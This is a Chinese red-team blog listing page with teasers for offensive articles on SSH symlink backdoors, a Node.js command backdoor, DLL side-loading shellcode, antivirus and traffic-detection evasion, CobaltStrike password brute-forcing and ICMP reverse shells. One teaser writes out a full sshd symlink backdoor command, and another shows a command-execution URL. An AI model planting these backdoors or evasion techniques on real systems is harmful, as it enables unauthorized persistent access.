红队技术

  • Linux软连接ssh后门之我见

    0x00 前言 学习了Sevck发表Linux软连接后门的《一条命令引发的思考》,还是存在几个疑惑点,仔细探究之后就有了这篇文章 0x01简单回顾 一、Linux经典软连接后门命令…

    2021年10月20日
  • ssh 软连接后门使用

    通过软连接建立一个ssh后门: ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 说明:建立软连接到/u…

    2021年10月20日
  • 利用配置不当提权

    利用管理员对服务器的权限分配不当完成的权限提升(开发者的意识不够强) 一般情况下面 普通用户对程序是没有控制权的 然后在c盘更目录下面生成了 asd文件 我们用记事本查看 就可以知…

    红队技术 2021年9月18日
  • node js 后门

    node app.js http://192.168.0.187:8000/?command=netstat%20-an

    2021年9月11日
  • 白加黑源码免杀学习

    概述 白程序:WeChat.exe 恶意dll:wechatwin.dll 制作流程 获取导出函数列表 shellcode写入内存加载 DllMain执行jmp_shellcode

    红队技术 2021年9月6日
  • MSF流量加密躲避检测

    为了防止主机被入侵,现在大部分的内网环境都装有流量审计工具,专门用来分析审查流量特征,分析网络流量,如后门特征、行为特征,像metasploit在内网做横行渗透时,这些流量很容易就…

    2021年8月5日
  • 完整渗透流程原理讲解与MSF免杀360

    以下是学员小苏自学三个月的一些心得,希望能帮助某些想入门的人 这篇主要对于零基础刚开始进行项目的朋友一个讲解帮助,第二部分免杀主要为思路讲解。上一篇文章 零基础学习渗透过程  首先…

    2021年8月1日
  • CobaltStrike TeamServer口令暴力破解

    CobaltStrike TeamServer口令暴力破解 Cobalt Strike是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,soc…

    2021年5月6日
  • 暗月实战项目九 不出网的情况下的内网多域控渗透

    项目九 是一个多域控 而且不出网的环境,是根据实际的环境改造而来。多 个域控应用在大型内网中,其中域控分有主域控,支部域控。例如一个公司在北 京有个总部办事处,广州有办事处,在上海…

    2021年2月2日
  • ICMP隧道反弹shell

    主机是可以使用ping 所以支持icmp协议出网 Icmpsh 这个攻击可以用icmp反弹shell 项目地址 https://github.com/inquisb/icmpsh …

    2021年1月15日

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息